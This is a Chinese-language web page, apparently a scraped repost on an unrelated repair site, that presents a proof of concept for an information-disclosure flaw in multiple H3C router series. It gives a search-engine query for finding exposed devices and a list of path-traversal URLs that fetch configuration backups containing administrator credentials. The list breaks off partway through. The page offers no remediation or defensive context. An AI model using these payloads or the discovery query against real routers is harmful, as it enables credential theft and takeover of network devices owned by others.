【漏洞复现】H3C 路由器多系列信息泄露漏洞

您所在的位置:网站首页 h3c路由器系统损坏 【漏洞复现】H3C 路由器多系列信息泄露漏洞

【漏洞复现】H3C 路由器多系列信息泄露漏洞

2024-07-12 20:48| 来源: 网络整理| 查看: 265

Nx01 产品简介

        H3C路由器是一款高性能的路由器产品,具有稳定的性能和丰富的功能。它采用了先进的路由技术和安全机制,可以满足不同用户的需求,广泛应用于企业、运营商和数据中心等领域。

Nx02 漏洞描述

        H3C路由器多系列存在信息泄露漏洞,攻击者可以利用该漏洞获取备份文件中的管理员账户及密码等敏感信息。

Nx03 产品主页

hunter-query:app.name="H3C Router Management"

Nx04 漏洞复现

POC:

/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg /userLogin.asp/../actionpolicy_status/../M60.cfg /userLogin.asp/../actionpolicy_status/../GR8300.cfg /userLogin.asp/../actionpolicy_status/../GR5200.cfg /userLogin.asp/../actionpolicy_status/../GR3200.cfg /userLogin.asp/../actionpolicy_status/../GR2200.cfg /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg /userLogin.asp/../actionpolicy_status/../ER8300G2.cfg /userLogin.asp/../actionpolicy_status/../ER6300G2.cfg /userLogin.asp/../actionpo


【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3